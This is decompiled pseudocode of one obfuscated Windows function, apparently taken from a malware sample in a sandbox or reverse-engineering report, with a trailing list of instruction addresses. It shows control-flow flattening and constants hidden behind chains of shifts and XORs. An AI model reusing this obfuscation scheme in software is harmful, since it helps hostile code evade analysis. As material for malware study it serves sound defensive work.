                                                      			E0023C769(intOrPtr __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, signed int _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40) {
                                                      				char _v4;
                                                      				char _v8;
                                                      				intOrPtr _v12;
                                                      				char _v16;
                                                      				intOrPtr _v20;
                                                      				char _v24;
                                                      				char _v28;
                                                      				intOrPtr _v32;
                                                      				signed int _v36;
                                                      				signed int _v40;
                                                      				signed int _v44;
                                                      				signed int _v48;
                                                      				signed int _v52;
                                                      				signed int _v56;
                                                      				signed int _v60;
                                                      				signed int _v64;
                                                      				signed int _v68;
                                                      				signed int _v72;
                                                      				signed int _v76;
                                                      				signed int _v80;
                                                      				signed int _v84;
                                                      				signed int _v88;
                                                      				signed int _v92;
                                                      				signed int _v96;
                                                      				signed int _v100;
                                                      				signed int _v104;
                                                      				signed int _v108;
                                                      				signed int _v112;
                                                      				signed int _v116;
                                                      				signed int _v120;
                                                      				signed int _v124;
                                                      				signed int _v128;
                                                      				signed int _v132;
                                                      				signed int _v136;
                                                      				signed int _v140;
                                                      				signed int _v144;
                                                      				signed int _v148;
                                                      				signed int _v152;
                                                      				signed int _v156;
                                                      				signed int _v160;
                                                      				signed int _v164;
                                                      				signed int _v168;
                                                      				signed int _v172;
                                                      				signed int _v176;
                                                      				signed int _v180;
                                                      				signed int _v184;
                                                      				signed int _v188;
                                                      				signed int _v192;
                                                      				signed int _v196;
                                                      				signed int _v200;
                                                      				signed int _v204;
                                                      				signed int _v208;
                                                      				signed int _v212;
                                                      				signed int _v216;
                                                      				signed int _v220;
                                                      				signed int _v224;
                                                      				signed int _v228;
                                                      				signed int _v232;
                                                      				signed int _v236;
                                                      				signed int _v240;
                                                      				signed int _v244;
                                                      				signed int _v248;
                                                      				signed int _v252;
                                                      				signed int _v256;
                                                      				signed int _v260;
                                                      				signed int _v264;
                                                      				signed int _v268;
                                                      				signed int _v272;
                                                      				signed int _v276;
                                                      				signed int _v280;
                                                      				signed int _v284;
                                                      				signed int _v288;
                                                      				unsigned int _v292;
                                                      				signed int _v296;
                                                      				signed int _v300;
                                                      				signed int _v304;
                                                      				signed int _v308;
                                                      				signed int _v312;
                                                      				intOrPtr _v316;
                                                      				char _v320;
                                                      				intOrPtr _t666;
                                                      				intOrPtr _t667;
                                                      				intOrPtr _t672;
                                                      				void* _t679;
                                                      				intOrPtr _t680;
                                                      				intOrPtr _t687;
                                                      				intOrPtr _t689;
                                                      				intOrPtr _t693;
                                                      				intOrPtr* _t694;
                                                      				signed int _t706;
                                                      				intOrPtr _t707;
                                                      				void* _t712;
                                                      				intOrPtr _t718;
                                                      				void* _t758;
                                                      				signed int _t773;
                                                      				signed int _t774;
                                                      				signed int _t775;
                                                      				signed int _t776;
                                                      				signed int _t777;
                                                      				signed int _t778;
                                                      				signed int _t779;
                                                      				signed int _t780;
                                                      				signed int _t781;
                                                      				signed int _t782;
                                                      				signed int _t783;
                                                      				signed int _t784;
                                                      				intOrPtr _t785;
                                                      				signed int _t786;
                                                      				intOrPtr _t788;
                                                      				char _t793;
                                                      				void* _t795;
                                                      				void* _t797;
                                                      
                                                      				_t694 = __edx;
                                                      				_push(_a40);
                                                      				_push(_a36);
                                                      				_v20 = __ecx;
                                                      				_push(_a32);
                                                      				_push(_a28);
                                                      				_push(_a24);
                                                      				_push(_a20 & 0x0000ffff);
                                                      				_push(_a16);
                                                      				_push(_a12);
                                                      				_push(_a8);
                                                      				_push(_a4);
                                                      				_push(__edx);
                                                      				_push(__ecx);
                                                      				E0023602B(_a20 & 0x0000ffff);
                                                      				_v12 = 0x78501c;
                                                      				_v24 = 0;
                                                      				_v8 = 0;
                                                      				_t793 = 0;
                                                      				_v4 = 0;
                                                      				_t795 =  &_v320 + 0x30;
                                                      				_v232 = 0x7906;
                                                      				_t786 = 0xcd25e5e;
                                                      				_v232 = _v232 << 6;
                                                      				_v232 = _v232 >> 0xa;
                                                      				_v232 = _v232 ^ 0x00000790;
                                                      				_v156 = 0xf83b;
                                                      				_v156 = _v156 >> 0xb;
                                                      				_v156 = _v156 ^ 0x0000000c;
                                                      				_v52 = 0x2ceb;
                                                      				_v52 = _v52 | 0xa5610ac4;
                                                      				_v52 = _v52 ^ 0xa5612e27;
                                                      				_v208 = 0x96db;
                                                      				_v208 = _v208 + 0xffffce2c;
                                                      				_v208 = _v208 | 0x71346f29;
                                                      				_v208 = _v208 ^ 0x7134ef2f;
                                                      				_v116 = 0x28a4;
                                                      				_v116 = _v116 + 0xffff342e;
                                                      				_v116 = _v116 ^ 0xffff1cd2;
                                                      				_v124 = 0xa3bc;
                                                      				_v124 = _v124 + 0xffffb3e2;
                                                      				_v124 = _v124 ^ 0x0040579e;
                                                      				_v132 = 0x4a92;
                                                      				_v132 = _v132 << 0xb;
                                                      				_v132 = _v132 ^ 0x02509000;
                                                      				_v140 = 0xcc93;
                                                      				_v140 = _v140 >> 0xd;
                                                      				_v140 = _v140 ^ 0x04000006;
                                                      				_v148 = 0xadf6;
                                                      				_v148 = _v148 >> 5;
                                                      				_v148 = _v148 ^ 0x0008056f;
                                                      				_v216 = 0xcf16;
                                                      				_v216 = _v216 ^ 0x2caffd24;
                                                      				_v216 = _v216 >> 8;
                                                      				_v216 = _v216 ^ 0x002cad32;
                                                      				_v296 = 0xe55e;
                                                      				_v296 = _v296 << 0x10;
                                                      				_v296 = _v296 + 0xffff79ea;
                                                      				_v296 = _v296 << 5;
                                                      				_v296 = _v296 ^ 0xabaf3c40;
                                                      				_v152 = 0xf9a;
                                                      				_v16 = 0;
                                                      				_v320 = 0;
                                                      				_v152 = _v152 * 0x3f;
                                                      				_v152 = _v152 ^ 0x8003d6e6;
                                                      				_v120 = 0x15;
                                                      				_v120 = _v120 << 2;
                                                      				_v120 = _v120 ^ 0x00000054;
                                                      				_v144 = 0x2eae;
                                                      				_v144 = _v144 + 0x3c19;
                                                      				_v144 = _v144 ^ 0x00006ac4;
                                                      				_v56 = 0xab01;
                                                      				_t773 = 0x5e;
                                                      				_v56 = _v56 / _t773;
                                                      				_v56 = _v56 ^ 0x00004cb8;
                                                      				_v104 = 0x2a8e;
                                                      				_t774 = 0x2c;
                                                      				_v104 = _v104 / _t774;
                                                      				_v104 = _v104 ^ 0x000033ed;
                                                      				_v292 = 0xd22b;
                                                      				_v292 = _v292 | 0xd3babaa8;
                                                      				_t775 = 0x50;
                                                      				_v292 = _v292 * 0x6c;
                                                      				_v292 = _v292 >> 7;
                                                      				_v292 = _v292 ^ 0x00a58d92;
                                                      				_v96 = 0x39fa;
                                                      				_v96 = _v96 / _t775;
                                                      				_v96 = _v96 ^ 0x00002d01;
                                                      				_v240 = 0xf5d4;
                                                      				_v240 = _v240 ^ 0x5b9fa071;
                                                      				_v240 = _v240 >> 3;
                                                      				_v240 = _v240 ^ 0x0b73efef;
                                                      				_v248 = 0x1311;
                                                      				_t776 = 0x42;
                                                      				_v248 = _v248 / _t776;
                                                      				_v248 = _v248 + 0x5e6d;
                                                      				_v248 = _v248 ^ 0x00004acc;
                                                      				_v88 = 0x907;
                                                      				_t777 = 0x6e;
                                                      				_v88 = _v88 * 0x48;
                                                      				_v88 = _v88 ^ 0x0002ff0c;
                                                      				_v36 = 0x8ec2;
                                                      				_v36 = _v36 / _t777;
                                                      				_v36 = _v36 ^ 0x00005772;
                                                      				_v260 = 0x4792;
                                                      				_v260 = _v260 << 0xd;
                                                      				_v260 = _v260 >> 0xb;
                                                      				_v260 = _v260 >> 4;
                                                      				_v260 = _v260 ^ 0x00006a86;
                                                      				_v224 = 0x4f89;
                                                      				_v224 = _v224 + 0xffff3059;
                                                      				_t778 = 0x21;
                                                      				_v224 = _v224 * 0x6e;
                                                      				_v224 = _v224 ^ 0xffc8e4d3;
                                                      				_v48 = 0x8858;
                                                      				_v48 = _v48 + 0x804a;
                                                      				_v48 = _v48 ^ 0x00017e21;
                                                      				_v312 = 0xd58c;
                                                      				_v312 = _v312 | 0x45747a0f;
                                                      				_v312 = _v312 >> 0xa;
                                                      				_v312 = _v312 / _t778;
                                                      				_v312 = _v312 ^ 0x00008646;
                                                      				_v300 = 0xadcd;
                                                      				_v300 = _v300 >> 8;
                                                      				_v300 = _v300 << 9;
                                                      				_v300 = _v300 >> 1;
                                                      				_v300 = _v300 ^ 0x00008fc4;
                                                      				_v268 = 0xd742;
                                                      				_t779 = 0x30;
                                                      				_v268 = _v268 / _t779;
                                                      				_v268 = _v268 + 0x61d9;
                                                      				_v268 = _v268 >> 4;
                                                      				_v268 = _v268 ^ 0x00000191;
                                                      				_v204 = 0x8d76;
                                                      				_v204 = _v204 | 0x1111a955;
                                                      				_v204 = _v204 << 5;
                                                      				_v204 = _v204 ^ 0x2235a282;
                                                      				_v64 = 0x8939;
                                                      				_v64 = _v64 + 0xffff3fc4;
                                                      				_v64 = _v64 ^ 0xffff80c7;
                                                      				_v276 = 0x72;
                                                      				_v276 = _v276 * 0x7d;
                                                      				_v276 = _v276 + 0xffff8366;
                                                      				_v276 = _v276 >> 9;
                                                      				_v276 = _v276 ^ 0x007facee;
                                                      				_v44 = 0xf34a;
                                                      				_v44 = _v44 + 0xffffbf38;
                                                      				_v44 = _v44 ^ 0x00008263;
                                                      				_v112 = 0x1dc0;
                                                      				_v112 = _v112 ^ 0x2c6551d7;
                                                      				_v112 = _v112 ^ 0x2c653ad3;
                                                      				_v228 = 0xc596;
                                                      				_v228 = _v228 ^ 0x9ca21630;
                                                      				_v228 = _v228 ^ 0x8f0fd5bf;
                                                      				_v228 = _v228 ^ 0x13ad7fff;
                                                      				_v196 = 0x8cfa;
                                                      				_v196 = _v196 >> 1;
                                                      				_v196 = _v196 ^ 0xfb4b109c;
                                                      				_v196 = _v196 ^ 0xfb4b1bca;
                                                      				_v236 = 0x2fd6;
                                                      				_v236 = _v236 << 7;
                                                      				_v236 = _v236 << 2;
                                                      				_v236 = _v236 ^ 0x005fedce;
                                                      				_v180 = 0x51a5;
                                                      				_v180 = _v180 ^ 0x4af0041f;
                                                      				_v180 = _v180 + 0xfffff3cf;
                                                      				_v180 = _v180 ^ 0x4af05e30;
                                                      				_v244 = 0x8950;
                                                      				_v244 = _v244 << 0xc;
                                                      				_v244 = _v244 | 0xbaabdb8a;
                                                      				_v244 = _v244 ^ 0xbabf869d;
                                                      				_v40 = 0xc836;
                                                      				_v40 = _v40 + 0xffff3474;
                                                      				_v40 = _v40 ^ 0xffff8af1;
                                                      				_v176 = 0x9727;
                                                      				_v176 = _v176 + 0xffffb8fc;
                                                      				_v176 = _v176 >> 3;
                                                      				_v176 = _v176 ^ 0x00001e80;
                                                      				_v304 = 0x64c7;
                                                      				_v304 = _v304 + 0x56f7;
                                                      				_v304 = _v304 ^ 0x2de137fe;
                                                      				_v304 = _v304 + 0xaf99;
                                                      				_v304 = _v304 ^ 0x2de22ef8;
                                                      				_v308 = 0x2e06;
                                                      				_v308 = _v308 | 0x78777a1f;
                                                      				_v308 = _v308 * 0x79;
                                                      				_v308 = _v308 >> 3;
                                                      				_v308 = _v308 ^ 0x1e0f1828;
                                                      				_v92 = 0xc9a2;
                                                      				_v92 = _v92 | 0xf3c29ea2;
                                                      				_v92 = _v92 ^ 0xf3c28d84;
                                                      				_v100 = 0xecbf;
                                                      				_v100 = _v100 + 0xffff0faf;
                                                      				_v100 = _v100 ^ 0xffffc0a5;
                                                      				_v192 = 0x95e0;
                                                      				_v192 = _v192 << 8;
                                                      				_v192 = _v192 << 9;
                                                      				_v192 = _v192 ^ 0x2bc00f3b;
                                                      				_v200 = 0x7c40;
                                                      				_t780 = 0x3a;
                                                      				_v200 = _v200 / _t780;
                                                      				_v200 = _v200 << 8;
                                                      				_v200 = _v200 ^ 0x000244df;
                                                      				_v272 = 0x7605;
                                                      				_v272 = _v272 << 5;
                                                      				_v272 = _v272 + 0xffffdeaf;
                                                      				_v272 = _v272 >> 0xb;
                                                      				_v272 = _v272 ^ 0x00001482;
                                                      				_v108 = 0x1c78;
                                                      				_v108 = _v108 + 0x3c33;
                                                      				_v108 = _v108 ^ 0x00006c40;
                                                      				_v280 = 0xd61a;
                                                      				_v280 = _v280 ^ 0xfb8fe6a7;
                                                      				_v280 = _v280 + 0x5fc;
                                                      				_v280 = _v280 | 0xbad3e440;
                                                      				_v280 = _v280 ^ 0xfbdf8156;
                                                      				_v288 = 0x89a2;
                                                      				_v288 = _v288 + 0xffff4641;
                                                      				_v288 = _v288 >> 0xc;
                                                      				_v288 = _v288 >> 0xd;
                                                      				_v288 = _v288 ^ 0x000071e8;
                                                      				_v252 = 0xe21c;
                                                      				_v252 = _v252 ^ 0x457ecc8f;
                                                      				_t781 = 0x67;
                                                      				_v252 = _v252 * 0x59;
                                                      				_v252 = _v252 ^ 0x28de7ded;
                                                      				_v84 = 0xe1;
                                                      				_v84 = _v84 >> 3;
                                                      				_v84 = _v84 ^ 0x00001e3a;
                                                      				_v184 = 0xbeeb;
                                                      				_v184 = _v184 * 0x12;
                                                      				_v184 = _v184 + 0x8ae1;
                                                      				_v184 = _v184 ^ 0x000de1ad;
                                                      				_v68 = 0xfd10;
                                                      				_v68 = _v68 >> 0xf;
                                                      				_v68 = _v68 ^ 0x000036f7;
                                                      				_v76 = 0x1f03;
                                                      				_v76 = _v76 * 0x49;
                                                      				_v76 = _v76 ^ 0x000897f9;
                                                      				_v264 = 0xf0d9;
                                                      				_v264 = _v264 * 0x66;
                                                      				_v264 = _v264 + 0xffffb5cf;
                                                      				_v264 = _v264 + 0xea22;
                                                      				_v264 = _v264 ^ 0x0060dcb6;
                                                      				_v168 = 0xdfa9;
                                                      				_v168 = _v168 ^ 0x7c3d7298;
                                                      				_v168 = _v168 ^ 0xd2777362;
                                                      				_v168 = _v168 ^ 0xae4ad343;
                                                      				_v72 = 0x8534;
                                                      				_v72 = _v72 ^ 0x085524ca;
                                                      				_v72 = _v72 ^ 0x085595c2;
                                                      				_v136 = 0x90f3;
                                                      				_v136 = _v136 + 0xcfad;
                                                      				_v136 = _v136 ^ 0x00017ab2;
                                                      				_v220 = 0x7eee;
                                                      				_v220 = _v220 >> 3;
                                                      				_v220 = _v220 + 0xffffea23;
                                                      				_v220 = _v220 ^ 0xffffcf89;
                                                      				_v164 = 0x31cc;
                                                      				_v164 = _v164 | 0x82d13576;
                                                      				_v164 = _v164 >> 3;
                                                      				_v164 = _v164 ^ 0x105a14dc;
                                                      				_v284 = 0xab9f;
                                                      				_v284 = _v284 / _t781;
                                                      				_v284 = _v284 + 0xffff982b;
                                                      				_v284 = _v284 + 0xcf45;
                                                      				_v284 = _v284 ^ 0x000072b9;
                                                      				_v80 = 0x4458;
                                                      				_v80 = _v80 + 0xfa7e;
                                                      				_v80 = _v80 ^ 0x000168e1;
                                                      				_v128 = 0x89b9;
                                                      				_v128 = _v128 + 0xe32e;
                                                      				_v128 = _v128 ^ 0x00010bac;
                                                      				_v172 = 0xe617;
                                                      				_v172 = _v172 << 4;
                                                      				_v172 = _v172 + 0xb499;
                                                      				_v172 = _v172 ^ 0x000f5cd6;
                                                      				_v212 = 0x2b1d;
                                                      				_v212 = _v212 << 0x10;
                                                      				_t782 = 0x21;
                                                      				_v212 = _v212 * 0x7f;
                                                      				_v212 = _v212 ^ 0x63636a51;
                                                      				_v188 = 0x87b6;
                                                      				_v188 = _v188 | 0xa87ad713;
                                                      				_v188 = _v188 << 3;
                                                      				_v188 = _v188 ^ 0x43d6c05c;
                                                      				_v60 = 0x1ec0;
                                                      				_v60 = _v60 / _t782;
                                                      				_v60 = _v60 ^ 0x000042c8;
                                                      				_v256 = 0x1798;
                                                      				_v256 = _v256 ^ 0x8091dd24;
                                                      				_v256 = _v256 | 0xdc47dedf;
                                                      				_t783 = 0x19;
                                                      				_v256 = _v256 * 0x5d;
                                                      				_v256 = _v256 ^ 0x3a6c6c2e;
                                                      				_v160 = 0x6f3f;
                                                      				_v160 = _v160 / _t783;
                                                      				_t784 = 0x73;
                                                      				_t785 = _v20;
                                                      				_v160 = _v160 / _t784;
                                                      				_v160 = _v160 ^ 0x00005ad1;
                                                      				while(1) {
                                                      					L1:
                                                      					_t758 = 0x1fbed331;
                                                      					while(1) {
                                                      						_t797 = _t786 - _t758;
                                                      						if(_t797 <= 0) {
                                                      						}
                                                      						L3:
                                                      						if(_t797 == 0) {
                                                      							__eflags = E00235B79(_t785, _v20);
                                                      							_t786 = 0x1b724d6a;
                                                      							_t679 = 1;
                                                      							_t793 =  !=  ? _t679 : _t793;
                                                      							L13:
                                                      							_t666 = _v316;
                                                      							L14:
                                                      							_t707 = _v320;
                                                      							goto L1;
                                                      						}
                                                      						if(_t786 == 0xa0d70be) {
                                                      							__eflags = _t694;
                                                      							if(_t694 == 0) {
                                                      								_t718 = 0;
                                                      								__eflags = 0;
                                                      							} else {
                                                      								_t718 =  *_t694;
                                                      							}
                                                      							__eflags = _t694;
                                                      							if(_t694 == 0) {
                                                      								_t680 = 0;
                                                      								__eflags = 0;
                                                      							} else {
                                                      								_t680 =  *((intOrPtr*)(_t694 + 4));
                                                      							}
                                                      							E00248422(_v72, _v136, _v220, _a28, _t785, _t680, _t718, _v164, _t718);
                                                      							_t795 = _t795 + 0x1c;
                                                      							asm("sbb esi, esi");
                                                      							_t786 = (_t786 & 0x1873afa8) + 0x1b724d6a;
                                                      							goto L13;
                                                      						}
                                                      						if(_t786 == 0xcd25e5e) {
                                                      							_t786 = 0x25fbc0d1;
                                                      							while(1) {
                                                      								_t797 = _t786 - _t758;
                                                      								if(_t797 <= 0) {
                                                      								}
                                                      								goto L25;
                                                      							}
                                                      							goto L3;
                                                      						}
                                                      						if(_t786 == 0xdfc12f5) {
                                                      							_t666 = E00247955(_a20, _v228, _v196, _t707, _v236, _v180, _t707, _v244, _v40, _v144, _a12, _t707, _v32, _t707, _v176);
                                                      							_t795 = _t795 + 0x34;
                                                      							_v316 = _t666;
                                                      							__eflags = _t666;
                                                      							_t786 =  !=  ? 0x20246154 : 0x1e7ff602;
                                                      							goto L14;
                                                      						}
                                                      						if(_t786 == 0x1b724d6a) {
                                                      							E00237925(_v284, _t785, _v80, _v128);
                                                      							_t786 = 0x2cd2473d;
                                                      							L12:
                                                      							goto L13;
                                                      						}
                                                      						if(_t786 != 0x1e7ff602) {
                                                      							L45:
                                                      							__eflags = _t786 - 0x258a7eda;
                                                      							if(_t786 == 0x258a7eda) {
                                                      								L10:
                                                      								return _t793;
                                                      							}
                                                      							_t666 = _v316;
                                                      							continue;
                                                      						}
                                                      						E00237925(_v60, _v32, _v256, _v160);
                                                      						goto L10;
                                                      						L25:
                                                      						__eflags = _t786 - 0x20246154;
                                                      						if(_t786 == 0x20246154) {
                                                      							__eflags = _t694;
                                                      							if(__eflags == 0) {
                                                      								_t787 = _v16;
                                                      							} else {
                                                      								_push(_v308);
                                                      								_t667 = E0024889D(0x24c850, _v304, __eflags);
                                                      								_t787 = _t667;
                                                      								_v16 = _t667;
                                                      							}
                                                      							_t785 = E00231BD7(_v152 | _v296 | _v216 | _v148 | _v140 | _v132 | _v124 | _v116 | _v208, _v92, _v100, _v192, _v200, _v152 | _v296 | _v216 | _v148 | _v140 | _v132 | _v124 | _v116 | _v208, _v316, _v152 | _v296 | _v216 | _v148 | _v140 | _v132 | _v124 | _v116 | _v208, _t705, _v272, _t787, _v108, _a24, _t705, _v280, _v288);
                                                      							_t706 = _v252;
                                                      							E00242025(_t706, _t787, _v84, _v184);
                                                      							_t795 = _t795 + 0x40;
                                                      							__eflags = _t785;
                                                      							if(_t785 == 0) {
                                                      								_t786 = 0x2cd2473d;
                                                      								L44:
                                                      								_t707 = _v320;
                                                      								_t758 = 0x1fbed331;
                                                      								goto L45;
                                                      							}
                                                      							_push(_t706);
                                                      							_v28 = 1;
                                                      							_t693 = E00246AFF(_v68, _v76, _v264,  &_v28, _v168, _t785);
                                                      							_t795 = _t795 + 0x18;
                                                      							_v28 = _t693;
                                                      							_t786 = 0xa0d70be;
                                                      							goto L13;
                                                      						}
                                                      						__eflags = _t786 - 0x25fbc0d1;
                                                      						if(_t786 == 0x25fbc0d1) {
                                                      							_push(0x200);
                                                      							_v24 = 0x200;
                                                      							_t788 = E00238736(0x200);
                                                      							_t712 = 0x200;
                                                      							__eflags = _t788;
                                                      							if(_t788 != 0) {
                                                      								_t687 = E0023F74E(_t712, _t788,  &_v24, _v96, _v240, _v248);
                                                      								_t795 = _t795 + 0x10;
                                                      								__eflags = _t687;
                                                      								if(_t687 == 0) {
                                                      									_t689 = E00240F0C(_v88, _t788, _t712, _v36, _v232, _t712, _v260);
                                                      									_t795 = _t795 + 0x14;
                                                      									_v320 = _t689;
                                                      								}
                                                      								E0023F536(_v224, _v48, _v312, _t788);
                                                      							}
                                                      							_t786 = 0x276816a4;
                                                      							goto L13;
                                                      						}
                                                      						__eflags = _t786 - 0x276816a4;
                                                      						if(_t786 == 0x276816a4) {
                                                      							_push(_t707);
                                                      							_t672 = E00235A52(_t707, _t707, _v300, _v268, _v204, _v64, _v120);
                                                      							__eflags = _t672;
                                                      							_v32 = _t672;
                                                      							_t786 =  !=  ? 0xdfc12f5 : 0x258a7eda;
                                                      							E0023F536(_v276, _v44, _v112, _v320);
                                                      							_t795 = _t795 + 0x24;
                                                      							goto L44;
                                                      						}
                                                      						__eflags = _t786 - 0x2cd2473d;
                                                      						if(_t786 == 0x2cd2473d) {
                                                      							E00237925(_v172, _t666, _v212, _v188);
                                                      							_t786 = 0x1e7ff602;
                                                      							goto L12;
                                                      						}
                                                      						__eflags = _t786 - 0x33e5fd12;
                                                      						if(__eflags != 0) {
                                                      							goto L45;
                                                      						}
                                                      						__eflags = E0024687F(_t785, _v156, __eflags) - _v52;
                                                      						_t758 = 0x1fbed331;
                                                      						_t666 = _v316;
                                                      						_t707 = _v320;
                                                      						_t786 =  ==  ? 0x1fbed331 : 0x1b724d6a;
                                                      					}
                                                      				}
                                                      			}
                                                      0x0023cb5a
                                                      0x0023cb65
                                                      0x0023cb6d
                                                      0x0023cb75
                                                      0x0023cb80
                                                      0x0023cb84
                                                      0x0023cb8c
                                                      0x0023cb94
                                                      0x0023cb99
                                                      0x0023cb9e
                                                      0x0023cba2
                                                      0x0023cbac
                                                      0x0023cbba
                                                      0x0023cbbd
                                                      0x0023cbc1
                                                      0x0023cbc9
                                                      0x0023cbce
                                                      0x0023cbd6
                                                      0x0023cbe1
                                                      0x0023cbec
                                                      0x0023cbf4
                                                      0x0023cbff
                                                      0x0023cc0a
                                                      0x0023cc15
                                                      0x0023cc20
                                                      0x0023cc2d
                                                      0x0023cc31
                                                      0x0023cc39
                                                      0x0023cc3e
                                                      0x0023cc46
                                                      0x0023cc51
                                                      0x0023cc5c
                                                      0x0023cc67
                                                      0x0023cc72
                                                      0x0023cc7d
                                                      0x0023cc88
                                                      0x0023cc90
                                                      0x0023cc98
                                                      0x0023cca0
                                                      0x0023cca8
                                                      0x0023ccb3
                                                      0x0023ccba
                                                      0x0023ccc5
                                                      0x0023ccd0
                                                      0x0023ccd8
                                                      0x0023ccdd
                                                      0x0023cce2
                                                      0x0023ccea
                                                      0x0023ccf5
                                                      0x0023cd00
                                                      0x0023cd0b
                                                      0x0023cd16
                                                      0x0023cd1e
                                                      0x0023cd23
                                                      0x0023cd2b
                                                      0x0023cd33
                                                      0x0023cd3e
                                                      0x0023cd49
                                                      0x0023cd54
                                                      0x0023cd5f
                                                      0x0023cd6a
                                                      0x0023cd72
                                                      0x0023cd7d
                                                      0x0023cd85
                                                      0x0023cd8d
                                                      0x0023cd95
                                                      0x0023cd9d
                                                      0x0023cda5
                                                      0x0023cdad
                                                      0x0023cdba
                                                      0x0023cdbe
                                                      0x0023cdc3
                                                      0x0023cdcb
                                                      0x0023cdd6
                                                      0x0023cde1
                                                      0x0023cdec
                                                      0x0023cdf7
                                                      0x0023ce02
                                                      0x0023ce0d
                                                      0x0023ce18
                                                      0x0023ce20
                                                      0x0023ce28
                                                      0x0023ce35
                                                      0x0023ce49
                                                      0x0023ce4e
                                                      0x0023ce57
                                                      0x0023ce5f
                                                      0x0023ce6a
                                                      0x0023ce72
                                                      0x0023ce77
                                                      0x0023ce7f
                                                      0x0023ce84
                                                      0x0023ce8c
                                                      0x0023ce97
                                                      0x0023cea2
                                                      0x0023cead
                                                      0x0023ceb5
                                                      0x0023cebd
                                                      0x0023cec5
                                                      0x0023cecd
                                                      0x0023ced5
                                                      0x0023cedd
                                                      0x0023cee5
                                                      0x0023ceea
                                                      0x0023ceef
                                                      0x0023cef7
                                                      0x0023ceff
                                                      0x0023cf0c
                                                      0x0023cf0d
                                                      0x0023cf11
                                                      0x0023cf19
                                                      0x0023cf24
                                                      0x0023cf2c
                                                      0x0023cf37
                                                      0x0023cf4a
                                                      0x0023cf51
                                                      0x0023cf5c
                                                      0x0023cf67
                                                      0x0023cf72
                                                      0x0023cf7a
                                                      0x0023cf85
                                                      0x0023cf98
                                                      0x0023cf9f
                                                      0x0023cfaa
                                                      0x0023cfb7
                                                      0x0023cfbb
                                                      0x0023cfc3
                                                      0x0023cfcb
                                                      0x0023cfd3
                                                      0x0023cfde
                                                      0x0023cfe9
                                                      0x0023cff4
                                                      0x0023cfff
                                                      0x0023d00a
                                                      0x0023d015
                                                      0x0023d020
                                                      0x0023d02b
                                                      0x0023d036
                                                      0x0023d041
                                                      0x0023d049
                                                      0x0023d04e
                                                      0x0023d056
                                                      0x0023d05e
                                                      0x0023d069
                                                      0x0023d074
                                                      0x0023d07c
                                                      0x0023d087
                                                      0x0023d095
                                                      0x0023d099
                                                      0x0023d0a1
                                                      0x0023d0a9
                                                      0x0023d0b1
                                                      0x0023d0bc
                                                      0x0023d0c7
                                                      0x0023d0d2
                                                      0x0023d0df
                                                      0x0023d0ea
                                                      0x0023d0f5
                                                      0x0023d100
                                                      0x0023d108
                                                      0x0023d113
                                                      0x0023d11e
                                                      0x0023d126
                                                      0x0023d132
                                                      0x0023d135
                                                      0x0023d13c
                                                      0x0023d147
                                                      0x0023d152
                                                      0x0023d15d
                                                      0x0023d165
                                                      0x0023d170
                                                      0x0023d186
                                                      0x0023d18d
                                                      0x0023d198
                                                      0x0023d1a0
                                                      0x0023d1a8
                                                      0x0023d1b5
                                                      0x0023d1b8
                                                      0x0023d1bc
                                                      0x0023d1c4
                                                      0x0023d1da
                                                      0x0023d1e8
                                                      0x0023d1eb
                                                      0x0023d1f2
                                                      0x0023d1f9
                                                      0x0023d208
                                                      0x0023d208
                                                      0x0023d208
                                                      0x0023d20d
                                                      0x0023d20d
                                                      0x0023d20f
                                                      0x0023d20f
                                                      0x0023d215
                                                      0x0023d215
                                                      0x0023d386
                                                      0x0023d388
                                                      0x0023d38f
                                                      0x0023d390
                                                      0x0023d29d
                                                      0x0023d29d
                                                      0x0023d2a1
                                                      0x0023d2a1
                                                      0x00000000
                                                      0x0023d2a1
                                                      0x0023d221
                                                      0x0023d31f
                                                      0x0023d321
                                                      0x0023d327
                                                      0x0023d327
                                                      0x0023d323
                                                      0x0023d323
                                                      0x0023d323
                                                      0x0023d329
                                                      0x0023d32b
                                                      0x0023d332
                                                      0x0023d332
                                                      0x0023d32d
                                                      0x0023d32d
                                                      0x0023d32d
                                                      0x0023d35b
                                                      0x0023d360
                                                      0x0023d365
                                                      0x0023d36d
                                                      0x00000000
                                                      0x0023d36d
                                                      0x0023d22d
                                                      0x0023d315
                                                      0x0023d20d
                                                      0x0023d20d
                                                      0x0023d20f
                                                      0x0023d20f
                                                      0x00000000
                                                      0x0023d20f
                                                      0x00000000
                                                      0x0023d20d
                                                      0x0023d23a
                                                      0x0023d2f8
                                                      0x0023d2fd
                                                      0x0023d300
                                                      0x0023d304
                                                      0x0023d310
                                                      0x00000000
                                                      0x0023d310
                                                      0x0023d242
                                                      0x0023d291
                                                      0x0023d296
                                                      0x0023d29b
                                                      0x00000000
                                                      0x0023d29c
                                                      0x0023d24a
                                                      0x0023d639
                                                      0x0023d639
                                                      0x0023d63f
                                                      0x0023d272
                                                      0x0023d27c
                                                      0x0023d27c
                                                      0x0023d645
                                                      0x00000000
                                                      0x0023d645
                                                      0x0023d269
                                                      0x00000000
                                                      0x0023d398
                                                      0x0023d398
                                                      0x0023d39e
                                                      0x0023d51a
                                                      0x0023d51c
                                                      0x0023d53c
                                                      0x0023d51e
                                                      0x0023d51e
                                                      0x0023d52b
                                                      0x0023d530
                                                      0x0023d533
                                                      0x0023d533
                                                      0x0023d5c9
                                                      0x0023d5d2
                                                      0x0023d5d9
                                                      0x0023d5de
                                                      0x0023d5e1
                                                      0x0023d5e3
                                                      0x0023d62b
                                                      0x0023d630
                                                      0x0023d630
                                                      0x0023d634
                                                      0x00000000
                                                      0x0023d634
                                                      0x0023d5e5
                                                      0x0023d5f1
                                                      0x0023d612
                                                      0x0023d617
                                                      0x0023d61a
                                                      0x0023d621
                                                      0x00000000
                                                      0x0023d621
                                                      0x0023d3a4
                                                      0x0023d3aa
                                                      0x0023d498
                                                      0x0023d49a
                                                      0x0023d4a6
                                                      0x0023d4a9
                                                      0x0023d4aa
                                                      0x0023d4ac
                                                      0x0023d4c7
                                                      0x0023d4cc
                                                      0x0023d4cf
                                                      0x0023d4d1
                                                      0x0023d4ed
                                                      0x0023d4f2
                                                      0x0023d4f5
                                                      0x0023d4f5
                                                      0x0023d509
                                                      0x0023d50f
                                                      0x0023d510
                                                      0x00000000
                                                      0x0023d510
                                                      0x0023d3b0
                                                      0x0023d3b6
                                                      0x0023d423
                                                      0x0023d442
                                                      0x0023d447
                                                      0x0023d449
                                                      0x0023d45a
                                                      0x0023d474
                                                      0x0023d479
                                                      0x00000000
                                                      0x0023d479
                                                      0x0023d3b8
                                                      0x0023d3be
